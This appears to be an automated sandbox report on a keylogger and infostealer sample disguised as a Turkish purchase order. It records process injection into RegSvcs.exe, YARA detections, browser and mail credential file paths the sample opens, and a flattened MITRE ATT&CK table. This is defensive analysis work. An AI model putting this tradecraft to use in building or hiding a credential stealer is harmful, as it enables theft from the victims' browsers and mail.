                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeAPI call chain: ExitProcess graph end nodegraph_0-98116
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeAPI call chain: ExitProcess graph end nodegraph_0-98190
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006C41FD BlockInput,0_2_006C41FD
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_00653B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00653B4C
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_00685CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00685CCC
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006CC304 LoadLibraryA,GetProcAddress,0_2_006CC304
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_037E34E0 mov eax, dword ptr fs:[00000030h]0_2_037E34E0
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_037E3480 mov eax, dword ptr fs:[00000030h]0_2_037E3480
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_037E1E70 mov eax, dword ptr fs:[00000030h]0_2_037E1E70
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006A81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_006A81F7
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_0067A364 SetUnhandledExceptionFilter,0_2_0067A364
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_0067A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0067A395
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DF5008Jump to behavior
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006A8C93 LogonUserW,0_2_006A8C93
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_00653B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00653B4C
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_00654A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00654A35
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006B4EF5 mouse_event,0_2_006B4EF5
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006A81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_006A81F7
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006B4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_006B4C03
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_0067886B cpuid 0_2_0067886B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006850D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_006850D7
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_00692230 GetUserNameW,0_2_00692230
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_0068418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0068418A
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_00654AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00654AFE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000002.00000002.3423549370.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe PID: 6244, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2400, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe PID: 6244, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2400, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeBinary or memory string: WIN_81
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeBinary or memory string: WIN_XP
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeBinary or memory string: WIN_XPe
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeBinary or memory string: WIN_VISTA
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeBinary or memory string: WIN_7
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeBinary or memory string: WIN_8
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                Source: Yara matchFile source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe PID: 6244, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2400, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000002.00000002.3423549370.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe PID: 6244, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2400, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe PID: 6244, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2400, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006C6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_006C6596
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006C6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_006C6A5A

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		2
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services11
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                DLL Side-Loading                		11
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		4
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                Valid Accounts                		3
                Obfuscated Files or Information                		Security Account Manager1
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                Access Token Manipulation                		1
                DLL Side-Loading                		NTDS127
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                Process Injection                		2
                Valid Accounts                		LSA Secrets131
                Security Software Discovery                		SSH3
                Clipboard Data                		14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                Virtualization/Sandbox Evasion                		Cached Domain Credentials11
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                Access Token Manipulation                		DCSync2
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                Process Injection                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Network Configuration Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.